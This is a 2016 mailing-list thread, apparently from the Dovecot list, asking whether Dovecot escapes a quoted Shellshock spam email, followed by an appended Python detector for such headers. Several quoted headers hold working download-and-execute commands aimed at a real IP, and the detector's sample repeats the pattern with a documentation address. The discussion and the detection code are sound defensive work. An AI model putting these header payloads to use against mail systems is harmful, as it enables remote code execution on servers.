> > On Jan 27, 2016, at 1:43 PM, Alexander Dalloz <ad+li...@uni-x.org> wrote:
> >
> > On 27.01.2016 at 21:10, Louis Kowolowski wrote:
>> I found an interesting email that got caught in my spam quarantine. I’m
>> wondering if dovecot is vulnerable to this kind of code execution (I’m aware
>> that other components could be vulnerable, but this question is specifically
>> targeting dovecot).
>>
>> The idea is to insert shell commands into various header fields that would
>> get executed as part of the message processing/delivery.
>>
>> Examples include:
>>
>> From: () {:;};/bin/sh -c 'cd /tmp;curl -sO 62.75.175.145/ex.sh;lwp-download
>> http: //62.75.175.145/ex...@nes.txt.com;,
>> w...@nes.txt.com, 62.75.175.145/ex...@nes.txt.com;,
>> fe...@nes.txt.com, 62.75.175.145/ex...@nes.txt.com;, s...@nes.txt.com,
>> ex...@nes.txt.com;, r...@nes.txt.com, -f...@nes.txt.com,
>> ex.*'@nes.txt.com, &@nes.txt.com;
>>
>> Subject:() { :; }; /bin/sh -c 'cd /tmp ;curl -sO
>> 62.75.175.145/ex.sh;lwp-download http://62.75.175.145/ex.sh;wget
>> 62.75.175.145/ex.sh;fetch 62.75.175.145/ex.sh;sh ex.sh;rm -fr ex.*' &;
>>
>> Date:() { :; }; /bin/sh -c 'cd /tmp ;curl -sO
>> 62.75.175.145/ex.sh;lwp-download http://62.75.175.145/ex.sh;wget
>> 62.75.175.145/ex.sh;fetch 62.75.175.145/ex.sh;sh ex.sh;rm -fr ex.*' &;
>>
>> Message-ID:() { :; }; /bin/sh -c 'cd /tmp ;curl -sO
>> 62.75.175.145/ex.sh;lwp-download http://62.75.175.145/ex.sh;wget
>> 62.75.175.145/ex.sh;fetch 62.75.175.145/ex.sh;sh ex.sh;rm -fr ex.*' &;
>>
>> The full message, should it be of interest, can be found here:
>>
>> https://dl.dropboxusercontent.com/u/17066730/interesting%20email.txt
>>
>> Thank you!
>> --
>> Louis Kowolowski lou...@cryptomonkeys.org
>> Cryptomonkeys:
>> http://www.cryptomonkeys.com/
>>
>> Making life more interesting for people since 1977
> >
> > Where had you been in 2014 when shellshock had been the big buzz?
> The system in question doesn’t have bash, and I’d already verified none of the other components were vulnerable. When I ran across this, I realized I hadn’t checked to ensure dovecot properly escaped things.
--
Louis Kowolowski lou...@cryptomonkeys.org
Cryptomonkeys: http://www.cryptomonkeys.com/
Making life more interesting for people since 1977
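A defender-side check for the header pattern discussed in this thread, added here as an example; it is not code from the list, from Louis, or from Dovecot. It parses a message with Python's stdlib `email` module and reports every header whose value begins with a Shellshock-style function definition (`() { :; };`), which is what a quarantine or log-review script would want to flag. The sample message is constructed to mirror the quoted one, with a TEST-NET documentation address in place of the real host.

```python
import email
import re
from email import policy
from typing import List, Tuple

# Shellshock-style payloads open with a bash function definition such as
# "() { :; };" (spacing varies, e.g. "() {:;};") followed by the commands
# the attacker hopes a vulnerable bash will run while importing the value.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")

# Constructed sample modelled on the message quoted in the thread.
# 192.0.2.10 is a documentation (TEST-NET-1) address, not a real host.
SAMPLE = b"""\
From: () { :; }; /bin/sh -c 'cd /tmp; curl -sO http://192.0.2.10/ex.sh; sh ex.sh'
To: user@example.invalid
Subject:() { :; }; /bin/sh -c 'cd /tmp; curl -sO http://192.0.2.10/ex.sh; sh ex.sh'
Date: () {:;}; /bin/sh -c 'cd /tmp; curl -sO http://192.0.2.10/ex.sh; sh ex.sh'
Message-ID: <constructed-id@example.invalid>

body text
"""


def find_shellshock_headers(raw: bytes) -> List[Tuple[str, str]]:
    """Return (header name, header value) pairs whose value carries a
    Shellshock-style function definition.

    compat32 is used deliberately: it hands back header values as the raw
    strings found in the message, whereas the modern policy would try to
    parse From/Date as structured headers and could reshape or drop the
    very text we want to inspect.
    """
    msg = email.message_from_bytes(raw, policy=policy.compat32)
    hits = []
    for name, value in msg.items():  # includes duplicate headers
        if SHELLSHOCK_RE.search(str(value)):
            hits.append((name, str(value)))
    return hits


if __name__ == "__main__":
    for name, value in find_shellshock_headers(SAMPLE):
        print(f"suspicious header {name}: {value[:60]}...")
```

Run against a quarantined message on disk, the function flags From, Subject and Date in the sample above and leaves the well-formed Message-ID alone; a clean message yields an empty list.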